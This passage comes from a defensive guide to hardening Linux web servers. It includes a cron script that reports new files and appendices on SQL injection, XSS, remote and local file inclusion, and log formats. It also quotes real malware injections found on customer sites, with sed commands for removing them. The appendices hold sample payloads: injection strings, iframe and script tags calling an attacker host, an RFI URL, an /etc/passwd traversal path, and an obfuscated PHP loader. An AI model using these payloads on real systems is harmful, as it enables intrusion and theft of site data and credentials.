        2. shell> nano newfiles.sh : open the nano editor to create a file called newfiles.sh (or download newfiles.sh)
        3. Insert the following code :
          • #!/bin/bash
          • MAIL="$(which sendmail)"
          • MAILTO="YourEmail" : eg. rasmusrummel@gmail.com
          • REPORTFILE="/YourScriptFolder/newfiles-report" : eg. /var/MyScripts/newfiles-report
          • HOSTNAME="$(hostname)" : if you have multiple servers, you will want to know on what host this script was running
          • DIRECTORY="/var/www" : folder to scan recursively for new files.
          • DAYSPAN=1
          • STARTTIME="$(/bin/date --date="-$DAYSPAN day" +%Y-%m-%d)T04:30:00"
          • echo -e "Subject: NewFiles scan report - " "$HOSTNAME" > $REPORTFILE
          • echo -e "\n----- NewFiles scan started : " "$(date)" " -----\n" >> $REPORTFILE
          • find $DIRECTORY -newermt "$STARTTIME" >> $REPORTFILE
          • echo -e "\n\n-----NewFiles scan ended : " "$(date)" " -----\n" >> $REPORTFILE
          • $MAIL $MAILTO < $REPORTFILE
        4. Press ctrl+x and then y to exit and save.
        5. shell> ls -l : you should see the newfiles.sh file in the list.
      2. shell> ./newfiles.sh : execute the script to confirm that everything works and that you get a report in your email inbox.
      3. Run newfiles.sh every night using Crontab :
        1. Get your relevant environment variables :
          1. shell> echo $SHELL : my shell is /bin/bash.
          2. shell> echo $PATH : my path is /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games.
        2. shell> crontab -e : open crontab in default editor (likely nano).
        3. Insert the following code at the top of the crontab file (if not already there) :
          • SHELL=/bin/bash : use your own value.
          • PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games : use your own value.
        4. Insert the following code at the bottom of the crontab file :
          • 5 4 * * * /var/MyScripts/newfiles.sh : execute the newfiles.sh script 5 minutes past 4 in the morning every day of the month, every month of the year and every day of the week.
        5. Press ctrl+x and then y to close the crontab file and save the changes.
      4. You should now get an email every morning with a new files report.
  7. Run a web vulnerability scanner to help you identify more website vulnerabilities. Find many more web vulnerability scanners @ SecTools web scanners.

Appendix : Typical hacker methods



Below are the most important methods hackers use to gain access to (in particular) linux web servers, and how to counter those methods. The Web Hacking Incident Database has statistics on top attack methods.

  • SQL Injection attacks : submitting sql snippets in form fields, trying to get the php, asp.net or other web code to execute rogue sql against the database with the intent to display database content, change database content, destroy database content or create errors that display configuration values.
    SQL Injection Example : say you have a search page, search.php, and on that page you have the following sql : "SELECT * FROM users WHERE name = '" + UserName + "'", where UserName comes from the search box on search.php. Normally you would put a name in the search box, eg. rasmus, and search.php would display information about rasmus if that user exists. However, a hacker could input ' OR '1'='1 which would give the following sql : "SELECT * FROM users WHERE name = '' OR '1'='1'" - you can see that this will display ALL records from the users table.
    SQL Injection Example 2 : on the same search page, the hacker now submits the following : rasmus';select * from userinfo; - the quote closes the string literal, and if multiple queries are allowed, everything from userinfo is now selected (php's mysql_query does not allow multiple statements in one call).
    SQL Injection Counter measure :
    • Escape special database characters, eg. single quotes, in user-submitted values.
    • Validate the submitted values, eg. if you expect an integer then don't allow a string (eg. "1;drop table users;" would be a nasty string if you expect an article number).
    • In PHP, use the PDO extension with prepared statements, so that user input is kept separate from the sql sent to the database.
  • Cross Site Scripting (XSS) refers to attacks where a hacker uses some form of user input, eg. form fields, to inject malicious code into a webpage with the intent to get that code executed in other users' browsers. XSS is a popular hacking method because so many websites use user generated data on their pages, so hackers can also put data on these pages. The Cross Site Scripting name, I think, comes from the fact that the malicious code in the web page comes from an external source.
    XSS Example : say you have a page with a comment track, and a hacker writes a comment that contains eg. an iframe pointing to his own bad.php page, like <iframe src="http://rusiahackers.ru/bad.php" />. Every time a user loads that page in a browser, the browser loads http://rusiahackers.ru/bad.php, which can do many things in the browser - eg. load a javascript file that changes all links on the page to the hacker's web page, trying to lure the user into giving up information such as login credentials or credit card information. While iframe and script tags are popular, a lot of other tags can be used; here are a few :
    • <iframe src="http://rusiahackers.ru/bad.php" />
    • <script src="http://rusiahackers.ru/bad.js">
    • <div style="background-image: url(javascript:something)">
    • <link rel="stylesheet" href="javascript:something;">
    • <table background="javascript:something">

    XSS Counter measure :
    • Filter inputted data by stripping all relevant tags, or at least validate user data. While many programmers will use eg. regular expressions to delete script, iframe and possibly some other tags from user data, this is not recommendable, mostly because there are quite many tags that can be used in ways you have not been thinking about, and also your regex fu is most likely not as good as the hacker's. Instead you should use a dedicated library like XSS Protect (for Java), HTML Purifier (for PHP) or AntiXSS (for .NET).
    • Escape inputted data, eg. every > should be changed to &#62;. Escaping also solves a problem with filtering : you may actually want users to be able to write "<iframe ... />", but with filtering such text would be deleted. Better than your own custom escape function is a dedicated library like ESAPI from OWASP, which can be used with multiple languages, among others .NET, PHP & Java, or Microsoft AntiXSS in all-Microsoft environments.
  • Remote File Inclusion (RFI) is when a hacker passes his own file as the value of a querystring parameter.
    RFI Example : say your index.php loads content based on a querystring param, eg. index.php?pageid=5, which in index.php may be passed raw to include($_GET["pageid"]). However, if a hacker writes index.php?pageid=http://rusiahackers.ru/bad.php in his browser's url field, then "http://rusiahackers.ru/bad.php" is passed to the php include() function and the bad.php script will actually execute, which would lead to the hacker gaining full control.
    RFI Counter measures :
    • Code to test that querystring parameters are legitimate.
    • Set allow_url_fopen = off and allow_url_include = off to prohibit include() from retrieving files from remote servers.
    • Use .htaccess rules to block requests that have web addresses in their querystring.
  • Local File Inclusion (LFI) is nearly the same as RFI, but instead of passing the hacker's own remote file, the hacker tries to reference a local file containing relevant information, eg. index.php?pageid=../../etc/passwd, showing the contents of the passwd file on the web page.
    LFI Example : if your index.php loads content like this : index.php?pageid=5, and your php code passes the pageid value raw to include() as include($_GET["pageid"]), then a hacker just has to guess the location of important system files on your web server - eg. the hacker could try the url index.php?pageid=../../etc/passwd in his browser, and if he gets the location correct, the passwd file is written out in his browser. The hacker can then work on the stolen file offline, eg. cracking password hashes, and eventually get root access to your server.
    LFI Counter measures :
    • Code to test that querystring parameters are legitimate.
    • Use .htaccess to block requests that move outside the website folder.
  • Using any builtin upload functionality in the website, eg. registering with a comment, blog or forum system, then uploading a php file and executing it by requesting it from a browser - these attacks can be countered by the programmers allowing only certain file types to be uploaded.
  • Malware on a user's computer : spyware like keyloggers may be able to snatch credentials when browsing or using ftp, so if a user has such malware and logs in to the admin system or uses ftp, then the hackers will have the same access to the server's file system as that user - these attacks can only be countered by updated antivirus software on the computers from which people, especially administrators, interact with the website.
  • Standard dictionary attacks on login pages, databases and ftp - these attacks can be countered by strong passwords.
  • Known vulnerabilities in different programs and the OS itself - eg. Mambo, Joomla, Wordpress etc. have well-known vulnerabilities, especially in older versions. On websites using such older programs it can be difficult to upgrade, and I am also not confident that Ubuntu upgrades will not break existing websites - I think this is a hard problem to counter.
  • There are many, many more ways to gain access to a system, however the above list probably contains the most important methods for the majority of low profile web sites (the kind of web sites we host @ Favourite Design).




Appendix : Log file formats

  • /var/log/apache2/access.log : Apache main log file. Default is combined format :
    • %h : client address. By default the IP address, but can be a hostname if HostnameLookups is set to On.
    • %l : client identity (identd on remote host). This value is typically not available and instead set to '-'.
    • %u : userid of the person requesting the page. If the page is not password protected, the value is not available and set to '-'.
    • %t : time the server finished the request as [day/month/year:hour:minute:second zone] (the time is postfixed with the time zone).
    • \"%r\" : request consisting of the method (eg. GET), the resource (eg. /logo.gif) and the protocol (eg. HTTP/1.1).
    • %>s : status code sent back to the client (2xx:success, 3xx:redirection, 4xx:errorByClient, 5xx:errorByServer).
    • %b : size of the response sent back to the client, not counting headers (a zero response body size is shown as '-').
    • \"%{Referer}i\" : http request header referer, eg. if the request resource is /logo.gif, then the referer is the page that loads logo.gif.
    • \"%{User-agent}i\" : http request header user-agent, the string by which the client browser identifies itself.


Appendix : Real world malware injection examples

The following is a list of malware injections I have encountered on Favourite Design customer websites.

  • document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://ayblsn.pcanywhere.net/7963895f2092c01672baa3dd66114659.sys?11"></iframe>');
    • here the src is set to ayblsn.pcanywhere.net/7963895f2092c01672baa3dd66114659.sys?11, which is clearly a malware url that will be loaded hidden (width:100px;left:-100px;) on the web page.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i "s%document\.write('<iframe[^<]*ayblsn\.pcanywhere[^<]*</iframe>')%%g" {} \; : note that sed does not support non-greedy expressions, so '[^<]*' is used instead of '.*' to avoid greedy matching.
  • <!--c3284d--><script type="text/javascript">document.write('<iframe src="http://playart.org/sites/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script><!--/c3284d-->
    • here the src is set to playart.org/sites/stats.php, which is a page that is hacked to deliver malicious code.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/<!--c3284d-->.*<!--\/c3284d-->//g;p}' {} \;
  • <!--c3284d--><script type="text/javascript" language="javascript" src="http://OurCustomerDomain//test/jquery.ui.button.min.js" ></script><!--/c3284d-->
    • here a script reference is injected pointing to a script file that in turn writes out an iframe loading malicious code.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/<!--c3284d-->.*<!--\/c3284d-->//g;p}' {} \;
      3. Delete the http://OurCustomerDomain//test/jquery.ui.button.min.js file.
  • $s=substr(8,1);foreach(array(52,123 ... urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}
    • here a php script consists mostly of number encoded characters to obfuscate what is going on.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -name "*.php" | xargs sed -i 's/\$s=substr.*$//' : here it is assumed that the code to remove is on 1 line and that no legit code follows on the same line. It is also assumed that this malware only exists in php files (it could also be written inside html files, but I have never seen that).
  • <wniwlmemfhxytkjwrmkefshuqluyvkav><script>function ojq()</script></wniwlmemfhxytkjwrmkefshuqluyvkav>
  • Ubuntu auth.log snippet (/var/log/auth.log) shows a dictionary attack :
    Feb  1 10:41:11 d1 sshd[27876]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.61.135.233  user=root
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): getting password (0x00000388)
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): pam_get_item returned a password
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user
    Feb  1 10:41:13 d1 sshd[27876]: Failed password for root from 183.61.135.233 port 15340 ssh2
    
    Above, someone from China (183.61.135.233) tries to log in over SSH as root. I get 10-20 of these every minute over a span of multiple days, using a list of likely usernames paired with likely passwords. I don't know of a good way to avoid these attacks, though I have considered blocking China, India and Iran. To avoid being an easy target for dictionary attacks, it is best NOT to let your customers create SSH, FTP & Backoffice passwords, but let them ask you to create passwords for them.


Appendix : Malware classifications

  • Trojans
  • Virus
  • Worms

